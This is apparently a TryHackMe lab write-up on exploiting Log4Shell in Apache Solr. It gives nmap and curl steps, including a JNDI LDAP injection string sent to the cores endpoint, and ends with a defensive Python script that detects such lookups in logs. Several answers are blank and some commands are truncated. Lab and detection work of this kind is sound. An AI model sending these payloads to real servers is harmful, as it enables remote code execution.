Exploiting log4j | TryHackMe Solar Write Up

CVE-2021-44228 Apache Solr 8.11.1

└─$ nmap solar.thm -p- -sC -sV

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

└─$ firefox http://solar.thm:8983

What is the -Dsolr.log.dir argument set to, displayed on the front page?


Which file contains this repeated entry? (Just the filename itself, no path needed)


What “path” or URL endpoint is indicated in these repeated entries?


Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Listening on
curl '$\{jndi:ldap://\}'
python3 -m http.server

What is the full path of the specific file?
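
A defender-side check for the request shown above, as an added example that is not part of the original write-up: it scans Solr request-log lines for a `${jndi:` lookup, URL-decoding first so that encoded variants are also caught. The log lines, their layout and the `collector.invalid` host are constructed for illustration, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the general shape of a Solr request log.
# Timestamps, thread names and the collector.invalid host are made up.
SAMPLE_LOG = """\
2021-12-13 03:47:53.989 INFO  (qtp1-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=0
2021-12-13 03:48:10.120 INFO  (qtp1-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://collector.invalid}} status=0 QTime=1
2021-12-13 03:48:11.004 INFO  (qtp1-23) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7BJNDI:ldap://collector.invalid%7D} status=0 QTime=1
2021-12-13 03:48:11.870 INFO  (qtp1-24) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%2524%257Bjndi:ldap://collector.invalid%257D} status=0 QTime=1
2021-12-13 03:48:12.300 INFO  (qtp1-25) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/info/system params={wt=json} status=0 QTime=3
"""

# Log4j lowercases the lookup prefix, so the match is case-insensitive.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)
PATH_RE = re.compile(r"\bpath=(\S+)")


def decode_fully(text, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(log_text):
    """Return one record per log line that carries a ${jndi:...} lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = JNDI_RE.search(decode_fully(line))
        if match:
            path = PATH_RE.search(line)
            hits.append({
                "line": lineno,
                "path": path.group(1) if path else None,
                "scheme": match.group(1).lower(),
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
```

A hit in the log means the string reached the logger, so treat it as a trigger to confirm the Log4j version and check for outbound LDAP connections from the host.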